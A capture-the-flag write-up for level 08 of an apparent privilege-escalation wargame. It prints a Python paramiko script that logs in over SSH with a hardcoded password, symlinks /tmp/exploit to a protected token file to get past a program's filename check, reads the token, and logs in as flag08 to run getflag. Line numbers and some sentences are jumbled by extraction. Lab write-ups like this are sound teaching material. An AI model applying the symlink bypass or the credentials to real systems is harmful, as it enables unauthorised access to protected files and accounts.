Introduction
In level 08, we exploit a vulnerable program level08 to obtain the flag by leveraging a Python script that utilizes SSH to execute commands.
Steps:
Understanding Exploit Python Script:
We examine the provided Python script:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31#!/usr/bin/python3
try:
from paramiko import SSHClient, AutoAddPolicy
from time import sleep
except ImportError as err:
print(err)
def get_token():
client = SSHClient()
client.set_missing_host_key_policy(AutoAddPolicy())
client.connect('10.13.249.103', username='level08', password='fiumuikeil55xe9cu4dood66h', port=4242)
sleep(1)
stdin, stdout, stderr = client.exec_command('rm -rf /tmp/exploit && ln -s $(pwd)/token /tmp/exploit && ./level08 /tmp/exploit')
output = stdout.read()
return (output.decode('utf-8').split('\n')[0])
def get_flag(token):
client = SSHClient()
client.set_missing_host_key_policy(AutoAddPolicy())
client.connect('10.13.249.103', username='flag08', password=token, port=4242)
sleep(1)
stdin, stdout, stderr = client.exec_command('getflag')
output = stdout.read()
return (output.decode('utf-8').split('\n')[0])
if __name__ == "__main__":
token = get_token()
print("[+] Humm the nunuts token... %s" % (token))
print("[+] Flag08 : %s" % (get_flag(token)))
The script uses paramiko library to establish SSH connections. get_token() function connects to the level08 user and creates a symbolic link /tmp/exploit to a file named token. It then executes ./level08 /tmp/exploit to obtain the token. get_flag() function connects to the flag08 user with the obtained token and retrieves the flag.
- Executing the Python Script:
We execute the Python script to retrieve the token and the flag:The script connects to the server, retrieves the token, and then uses it to connect as1
$ python3 exploit.py
flag08and obtain the flag.
Conclusion
By exploiting the vulnerability in the level08 program using the provided Python script, we successfully retrieved the flag for level 08.